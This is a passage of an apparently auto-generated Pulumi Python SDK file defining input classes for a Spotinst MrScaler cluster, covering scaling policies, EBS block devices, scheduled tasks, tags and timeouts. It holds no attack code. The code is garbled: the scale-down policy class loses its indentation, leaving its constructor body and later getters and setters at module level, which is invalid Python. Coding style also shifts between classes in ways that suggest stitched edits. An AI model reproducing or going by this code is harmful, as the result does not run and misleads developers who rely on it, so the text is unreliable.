    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """The number of periods over which data is compared to the specified threshold."""
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)

    @property
    @pulumi.getter(name="maxTargetCapacity")
    def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """Max target capacity for scale down."""
        return pulumi.get(self, "max_target_capacity")

    @max_target_capacity.setter
    def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_target_capacity", value)

    @property
    @pulumi.getter
    def maximum(self) -> Optional[pulumi.Input[str]]:
        """The maximum to set when scale is needed."""
        return pulumi.get(self, "maximum")

    @maximum.setter
    def maximum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "maximum", value)

    @property
    @pulumi.getter(name="minTargetCapacity")
    def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """Min target capacity for scale up."""
        return pulumi.get(self, "min_target_capacity")

    @min_target_capacity.setter
    def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_target_capacity", value)

    @property
    @pulumi.getter
    def minimum(self) -> Optional[pulumi.Input[str]]:
        """The minimum to set when scale is needed."""
        return pulumi.get(self, "minimum")

    @minimum.setter
    def minimum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "minimum", value)

    @property
    @pulumi.getter
    def operator(self) -> Optional[pulumi.Input[str]]:
        """The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`"""
        return pulumi.get(self, "operator")

    @operator.setter
    def operator(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "operator", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """The time window in seconds over which the statistic is applied."""
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`"""
        return pulumi.get(self, "statistic")

    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statistic", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """The number of instances to set when scale is needed."""
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarInstanceWeightArgs:
    def __init__(__self__, *,
                 instance_type: pulumi.Input[str],
                 weighted_capacity: pulumi.Input[int]):
        """
        Pairs an instance type with its capacity weight.

        :param pulumi.Input[str] instance_type: The type of the instance.
        :param pulumi.Input[int] weighted_capacity: The weight given to the associated instance type.
        """
        # Both fields are required; record them in declaration order.
        for field_name, field_value in (("instance_type", instance_type),
                                        ("weighted_capacity", weighted_capacity)):
            pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter(name="instanceType")
    def instance_type(self) -> pulumi.Input[str]:
        """The type of the instance."""
        return pulumi.get(self, "instance_type")

    @instance_type.setter
    def instance_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "instance_type", value)

    @property
    @pulumi.getter(name="weightedCapacity")
    def weighted_capacity(self) -> pulumi.Input[int]:
        """The weight given to the associated instance type."""
        return pulumi.get(self, "weighted_capacity")

    @weighted_capacity.setter
    def weighted_capacity(self, value: pulumi.Input[int]):
        pulumi.set(self, "weighted_capacity", value)
@pulumi.input_type
class MrScalarMasterEbsBlockDeviceArgs:
    def __init__(__self__, *,
                 size_in_gb: pulumi.Input[int],
                 volume_type: pulumi.Input[str],
                 iops: Optional[pulumi.Input[int]] = None,
                 volumes_per_instance: Optional[pulumi.Input[int]] = None):
        """
        EBS block device configuration for the master instance group.

        :param pulumi.Input[int] size_in_gb: Size of the volume, in GBs.
        :param pulumi.Input[str] volume_type: volume type. Allowed values are 'gp2', 'io1' and others.
        :param pulumi.Input[int] iops: IOPS for the volume. Required in some volume types, such as io1.
        :param pulumi.Input[int] volumes_per_instance: Amount of volumes per instance in the master group.
        """
        pulumi.set(__self__, "size_in_gb", size_in_gb)
        pulumi.set(__self__, "volume_type", volume_type)
        # Optional fields are recorded only when supplied by the caller.
        for opt_name, opt_value in (("iops", iops),
                                    ("volumes_per_instance", volumes_per_instance)):
            if opt_value is not None:
                pulumi.set(__self__, opt_name, opt_value)

    @property
    @pulumi.getter(name="sizeInGb")
    def size_in_gb(self) -> pulumi.Input[int]:
        """Size of the volume, in GBs."""
        return pulumi.get(self, "size_in_gb")

    @size_in_gb.setter
    def size_in_gb(self, value: pulumi.Input[int]):
        pulumi.set(self, "size_in_gb", value)

    @property
    @pulumi.getter(name="volumeType")
    def volume_type(self) -> pulumi.Input[str]:
        """volume type. Allowed values are 'gp2', 'io1' and others."""
        return pulumi.get(self, "volume_type")

    @volume_type.setter
    def volume_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "volume_type", value)

    @property
    @pulumi.getter
    def iops(self) -> Optional[pulumi.Input[int]]:
        """IOPS for the volume. Required in some volume types, such as io1."""
        return pulumi.get(self, "iops")

    @iops.setter
    def iops(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "iops", value)

    @property
    @pulumi.getter(name="volumesPerInstance")
    def volumes_per_instance(self) -> Optional[pulumi.Input[int]]:
        """Amount of volumes per instance in the master group."""
        return pulumi.get(self, "volumes_per_instance")

    @volumes_per_instance.setter
    def volumes_per_instance(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "volumes_per_instance", value)
@pulumi.input_type
class MrScalarProvisioningTimeoutArgs:
    def __init__(__self__, *,
                 timeout: pulumi.Input[int],
                 timeout_action: pulumi.Input[str]):
        """
        Provisioning-timeout settings for the cluster.

        :param pulumi.Input[int] timeout: The amount of time (minutes) after which the cluster is automatically terminated if it's still in provisioning status. Minimum: '15'.
        :param pulumi.Input[str] timeout_action: The action to take if the timeout is exceeded. Valid values: `terminate`, `terminateAndRetry`.
        """
        # Both fields are required; record them in declaration order.
        for field_name, field_value in (("timeout", timeout),
                                        ("timeout_action", timeout_action)):
            pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def timeout(self) -> pulumi.Input[int]:
        """The amount of time (minutes) after which the cluster is automatically terminated if it's still in provisioning status. Minimum: '15'."""
        return pulumi.get(self, "timeout")

    @timeout.setter
    def timeout(self, value: pulumi.Input[int]):
        pulumi.set(self, "timeout", value)

    @property
    @pulumi.getter(name="timeoutAction")
    def timeout_action(self) -> pulumi.Input[str]:
        """The action to take if the timeout is exceeded. Valid values: `terminate`, `terminateAndRetry`."""
        return pulumi.get(self, "timeout_action")

    @timeout_action.setter
    def timeout_action(self, value: pulumi.Input[str]):
        pulumi.set(self, "timeout_action", value)
@pulumi.input_type
class MrScalarScheduledTaskArgs:
    def __init__(__self__, *,
                 cron: pulumi.Input[str],
                 instance_group_type: pulumi.Input[str],
                 task_type: pulumi.Input[str],
                 desired_capacity: Optional[pulumi.Input[str]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None,
                 max_capacity: Optional[pulumi.Input[str]] = None,
                 min_capacity: Optional[pulumi.Input[str]] = None):
        """
        A scheduled capacity task for the cluster.

        :param pulumi.Input[str] cron: A cron expression representing the schedule for the task.
        :param pulumi.Input[str] instance_group_type: Select the EMR instance groups to execute the scheduled task on. Valid values: `task`.
        :param pulumi.Input[str] task_type: The type of task to be scheduled. Valid values: `setCapacity`.
        :param pulumi.Input[str] desired_capacity: New desired capacity for the elastigroup.
        :param pulumi.Input[bool] is_enabled: Enable/Disable the specified scheduling task.
        :param pulumi.Input[str] max_capacity: New max capacity for the elastigroup.
        :param pulumi.Input[str] min_capacity: New min capacity for the elastigroup.
        """
        # Required fields are always recorded.
        for req_name, req_value in (("cron", cron),
                                    ("instance_group_type", instance_group_type),
                                    ("task_type", task_type)):
            pulumi.set(__self__, req_name, req_value)
        # Optional fields are recorded only when supplied by the caller.
        for opt_name, opt_value in (("desired_capacity", desired_capacity),
                                    ("is_enabled", is_enabled),
                                    ("max_capacity", max_capacity),
                                    ("min_capacity", min_capacity)):
            if opt_value is not None:
                pulumi.set(__self__, opt_name, opt_value)

    @property
    @pulumi.getter
    def cron(self) -> pulumi.Input[str]:
        """A cron expression representing the schedule for the task."""
        return pulumi.get(self, "cron")

    @cron.setter
    def cron(self, value: pulumi.Input[str]):
        pulumi.set(self, "cron", value)

    @property
    @pulumi.getter(name="instanceGroupType")
    def instance_group_type(self) -> pulumi.Input[str]:
        """Select the EMR instance groups to execute the scheduled task on. Valid values: `task`."""
        return pulumi.get(self, "instance_group_type")

    @instance_group_type.setter
    def instance_group_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "instance_group_type", value)

    @property
    @pulumi.getter(name="taskType")
    def task_type(self) -> pulumi.Input[str]:
        """The type of task to be scheduled. Valid values: `setCapacity`."""
        return pulumi.get(self, "task_type")

    @task_type.setter
    def task_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "task_type", value)

    @property
    @pulumi.getter(name="desiredCapacity")
    def desired_capacity(self) -> Optional[pulumi.Input[str]]:
        """New desired capacity for the elastigroup."""
        return pulumi.get(self, "desired_capacity")

    @desired_capacity.setter
    def desired_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "desired_capacity", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Enable/Disable the specified scheduling task."""
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="maxCapacity")
    def max_capacity(self) -> Optional[pulumi.Input[str]]:
        """New max capacity for the elastigroup."""
        return pulumi.get(self, "max_capacity")

    @max_capacity.setter
    def max_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_capacity", value)

    @property
    @pulumi.getter(name="minCapacity")
    def min_capacity(self) -> Optional[pulumi.Input[str]]:
        """New min capacity for the elastigroup."""
        return pulumi.get(self, "min_capacity")

    @min_capacity.setter
    def min_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_capacity", value)
@pulumi.input_type
class MrScalarStepsFileArgs:
    def __init__(__self__, *,
                 bucket: pulumi.Input[str],
                 key: pulumi.Input[str]):
        """
        S3 location of a steps file.

        :param pulumi.Input[str] bucket: S3 Bucket name for bootstrap actions.
        :param pulumi.Input[str] key: S3 key for bootstrap actions.
        """
        # Both fields are required; record them in declaration order.
        for field_name, field_value in (("bucket", bucket), ("key", key)):
            pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def bucket(self) -> pulumi.Input[str]:
        """S3 Bucket name for bootstrap actions."""
        return pulumi.get(self, "bucket")

    @bucket.setter
    def bucket(self, value: pulumi.Input[str]):
        pulumi.set(self, "bucket", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """S3 key for bootstrap actions."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)
@pulumi.input_type
class MrScalarTagArgs:
    # Doc fix: `key` was previously described as "S3 key for bootstrap actions",
    # a copy/paste from MrScalarStepsFileArgs. In this tag pair (key/value) it
    # is the tag key.
    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: Tag key.
        :param pulumi.Input[str] value: Tag value.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "value", value)
    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        Tag key.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        Tag value.
        """
        return pulumi.get(self, "value")
    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class MrScalarTaskEbsBlockDeviceArgs:
    # Doc fix: `volumes_per_instance` was previously described as "in the
    # master group", a copy/paste from MrScalarMasterEbsBlockDeviceArgs; this
    # class configures the task group's EBS block devices.
    def __init__(__self__, *,
                 size_in_gb: pulumi.Input[int],
                 volume_type: pulumi.Input[str],
                 iops: Optional[pulumi.Input[int]] = None,
                 volumes_per_instance: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] size_in_gb: Size of the volume, in GBs.
        :param pulumi.Input[str] volume_type: volume type. Allowed values are 'gp2', 'io1' and others.
        :param pulumi.Input[int] iops: IOPS for the volume. Required in some volume types, such as io1.
        :param pulumi.Input[int] volumes_per_instance: Amount of volumes per instance in the task group.
        """
        pulumi.set(__self__, "size_in_gb", size_in_gb)
        pulumi.set(__self__, "volume_type", volume_type)
        if iops is not None:
            pulumi.set(__self__, "iops", iops)
        if volumes_per_instance is not None:
            pulumi.set(__self__, "volumes_per_instance", volumes_per_instance)
    @property
    @pulumi.getter(name="sizeInGb")
    def size_in_gb(self) -> pulumi.Input[int]:
        """
        Size of the volume, in GBs.
        """
        return pulumi.get(self, "size_in_gb")
    @size_in_gb.setter
    def size_in_gb(self, value: pulumi.Input[int]):
        pulumi.set(self, "size_in_gb", value)
    @property
    @pulumi.getter(name="volumeType")
    def volume_type(self) -> pulumi.Input[str]:
        """
        volume type. Allowed values are 'gp2', 'io1' and others.
        """
        return pulumi.get(self, "volume_type")
    @volume_type.setter
    def volume_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "volume_type", value)
    @property
    @pulumi.getter
    def iops(self) -> Optional[pulumi.Input[int]]:
        """
        IOPS for the volume. Required in some volume types, such as io1.
        """
        return pulumi.get(self, "iops")
    @iops.setter
    def iops(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "iops", value)
    @property
    @pulumi.getter(name="volumesPerInstance")
    def volumes_per_instance(self) -> Optional[pulumi.Input[int]]:
        """
        Amount of volumes per instance in the task group.
        """
        return pulumi.get(self, "volumes_per_instance")
    @volumes_per_instance.setter
    def volumes_per_instance(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "volumes_per_instance", value)
@pulumi.input_type
class MrScalarTaskScalingDownPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
threshold: pulumi.Input[float],
unit: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
statistic: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric in CloudWatch which the statement will be based on.
:param pulumi.Input[str] namespace: Must contain the value: `AWS/ElasticMapReduce`.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[float] threshold: The value that the specified statistic is compared to.
:param pulumi.Input[str] unit: The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
:param pulumi.Input[str] action_type: The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed.
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
:param pulumi.Input[Mapping[str, Any]] dimensions: A mapping of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
:param pulumi.Input[str] maximum: The maximum to set when scale is needed.
:param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
:param pulumi.Input[str] minimum: The minimum to set when scale is needed.
:param pulumi.Input[str] operator: The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
:param pulumi.Input[int] period: The time window in seconds over which the statistic is applied.
:param pulumi.Input[str] statistic: The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
:param pulumi.Input[str] target: The number of instances to set when scale is needed.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "unit", unit)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric in CloudWatch which the statement will be based on.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
    """
    Must contain the value: `AWS/ElasticMapReduce`.
    """
    return pulumi.get(self, "namespace")

@namespace.setter
def namespace(self, value: pulumi.Input[str]):
    # Store the new value via pulumi's property machinery.
    pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
    """
    The name of the policy.
    """
    return pulumi.get(self, "policy_name")

@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
    # Store the new value under the "policy_name" key.
    pulumi.set(self, "policy_name", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[float]:
    """
    The value that the specified statistic is compared to.
    """
    return pulumi.get(self, "threshold")

@threshold.setter
def threshold(self, value: pulumi.Input[float]):
    # Store the new threshold via pulumi's property machinery.
    pulumi.set(self, "threshold", value)
@property
@pulumi.getter
def unit(self) -> pulumi.Input[str]:
    """
    The unit for a given metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
    """
    return pulumi.get(self, "unit")

@unit.setter
def unit(self, value: pulumi.Input[str]):
    # Store the new unit string via pulumi's property machinery.
    pulumi.set(self, "unit", value)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> Optional[pulumi.Input[str]]:
    """
    The type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
    """
    return pulumi.get(self, "action_type")

@action_type.setter
def action_type(self, value: Optional[pulumi.Input[str]]):
    # Optional field; storing None is allowed here.
    pulumi.set(self, "action_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
    """
    The number of instances to add/remove to/from the target capacity when scale is needed.
    """
    return pulumi.get(self, "adjustment")

@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "adjustment", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
    """
    The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start.
    """
    return pulumi.get(self, "cooldown")

@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
    """
    A mapping of dimensions describing qualities of the metric.
    """
    return pulumi.get(self, "dimensions")

@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
    # Optional mapping; delegates to pulumi's property store.
    pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
    """
    The number of periods over which data is compared to the specified threshold.
    """
    return pulumi.get(self, "evaluation_periods")

@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
    """
    Max target capacity for scale down.
    """
    return pulumi.get(self, "max_target_capacity")

@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
    """
    The maximum to set when scale is needed.
    """
    return pulumi.get(self, "maximum")

@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
    """
    Min target capacity for scale up.
    """
    return pulumi.get(self, "min_target_capacity")

@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
    """
    The minimum to set when scale is needed.
    """
    return pulumi.get(self, "minimum")

@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
    """
    The operator to use in order to determine if the policy is applicable. Valid values: `gt` | `gte` | `lt` | `lte`
    """
    return pulumi.get(self, "operator")

@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
    """
    The time window in seconds over which the statistic is applied.
    """
    return pulumi.get(self, "period")

@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "period", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
    """
    The aggregation method of the given metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
    """
    return pulumi.get(self, "statistic")

@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
    """
    The number of instances to set when scale is needed.
    """
    return pulumi.get(self, "target")

@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
    # Optional field; delegates to pulumi's property store.
    pulumi.set(self, "target", value)
@pulumi.input_type
class MrScalarTaskScalingUpPolicyArgs:
    """Input arguments for one scale-up policy statement of a MrScaler task group."""

    def __init__(__self__, *,
                 metric_name: pulumi.Input[str],
                 namespace: pulumi.Input[str],
                 policy_name: pulumi.Input[str],
                 threshold: pulumi.Input[float],
                 unit: pulumi.Input[str],
                 action_type: Optional[pulumi.Input[str]] = None,
                 adjustment: Optional[pulumi.Input[str]] = None,
                 cooldown: Optional[pulumi.Input[int]] = None,
                 dimensions: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 max_target_capacity: Optional[pulumi.Input[str]] = None,
                 maximum: Optional[pulumi.Input[str]] = None,
                 min_target_capacity: Optional[pulumi.Input[str]] = None,
                 minimum: Optional[pulumi.Input[str]] = None,
                 operator: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 statistic: Optional[pulumi.Input[str]] = None,
                 target: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] metric_name: Name of the CloudWatch metric this statement evaluates.
        :param pulumi.Input[str] namespace: CloudWatch namespace; must contain the value: `AWS/ElasticMapReduce`.
        :param pulumi.Input[str] policy_name: Name of the scaling policy.
        :param pulumi.Input[float] threshold: Value against which the specified statistic is compared.
        :param pulumi.Input[str] unit: Unit of the metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`
        :param pulumi.Input[str] action_type: Type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'
        :param pulumi.Input[str] adjustment: Number of instances to add/remove to/from the target capacity when scaling is required.
        :param pulumi.Input[int] cooldown: Time, in seconds, that must elapse after a scaling activity completes before the next one may start.
        :param pulumi.Input[Mapping[str, Any]] dimensions: Mapping of dimensions describing qualities of the metric.
        :param pulumi.Input[int] evaluation_periods: Number of periods over which data is compared to the specified threshold.
        :param pulumi.Input[str] max_target_capacity: Max target capacity for scale down.
        :param pulumi.Input[str] maximum: Maximum to set when scaling is required.
        :param pulumi.Input[str] min_target_capacity: Min target capacity for scale up.
        :param pulumi.Input[str] minimum: Minimum to set when scaling is required.
        :param pulumi.Input[str] operator: Comparison operator used to decide whether the policy applies. Valid values: `gt` | `gte` | `lt` | `lte`
        :param pulumi.Input[int] period: Time window, in seconds, over which the statistic is applied.
        :param pulumi.Input[str] statistic: Aggregation method for the metric. Valid Values: `average` | `sum` | `sampleCount` | `maximum` | `minimum`
        :param pulumi.Input[str] target: Number of instances to set when scaling is required.
        """
        # Required statement fields are always recorded.
        pulumi.set(__self__, "metric_name", metric_name)
        pulumi.set(__self__, "namespace", namespace)
        pulumi.set(__self__, "policy_name", policy_name)
        pulumi.set(__self__, "threshold", threshold)
        pulumi.set(__self__, "unit", unit)
        # Optional fields are recorded only when the caller supplied them.
        for _key, _val in (
                ("action_type", action_type),
                ("adjustment", adjustment),
                ("cooldown", cooldown),
                ("dimensions", dimensions),
                ("evaluation_periods", evaluation_periods),
                ("max_target_capacity", max_target_capacity),
                ("maximum", maximum),
                ("min_target_capacity", min_target_capacity),
                ("minimum", minimum),
                ("operator", operator),
                ("period", period),
                ("statistic", statistic),
                ("target", target)):
            if _val is not None:
                pulumi.set(__self__, _key, _val)

    @property
    @pulumi.getter(name="metricName")
    def metric_name(self) -> pulumi.Input[str]:
        """Name of the CloudWatch metric this statement evaluates."""
        return pulumi.get(self, "metric_name")

    @metric_name.setter
    def metric_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "metric_name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """CloudWatch namespace; must contain the value: `AWS/ElasticMapReduce`."""
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="policyName")
    def policy_name(self) -> pulumi.Input[str]:
        """Name of the scaling policy."""
        return pulumi.get(self, "policy_name")

    @policy_name.setter
    def policy_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "policy_name", value)

    @property
    @pulumi.getter
    def threshold(self) -> pulumi.Input[float]:
        """Value against which the specified statistic is compared."""
        return pulumi.get(self, "threshold")

    @threshold.setter
    def threshold(self, value: pulumi.Input[float]):
        pulumi.set(self, "threshold", value)

    @property
    @pulumi.getter
    def unit(self) -> pulumi.Input[str]:
        """Unit of the metric. Valid Values: `seconds` | `microseconds` | `milliseconds` | `bytes` | `kilobytes` | `megabytes` | `gigabytes` | `terabytes` | `bits` | `kilobits` | `megabits` | `gigabits` | `terabits` | `percent` | `count` | `bytes/second` | `kilobytes/second` | `megabytes/second` | `gigabytes/second` | `terabytes/second` | `bits/second` | `kilobits/second` | `megabits/second` | `gigabits/second` | `terabits/second` | `count/second` | `none`"""
        return pulumi.get(self, "unit")

    @unit.setter
    def unit(self, value: pulumi.Input[str]):
        pulumi.set(self, "unit", value)

    @property
    @pulumi.getter(name="actionType")
    def action_type(self) -> Optional[pulumi.Input[str]]:
        """Type of action to perform. Allowed values are : 'adjustment', 'setMinTarget', 'setMaxTarget', 'updateCapacity', 'percentageAdjustment'"""
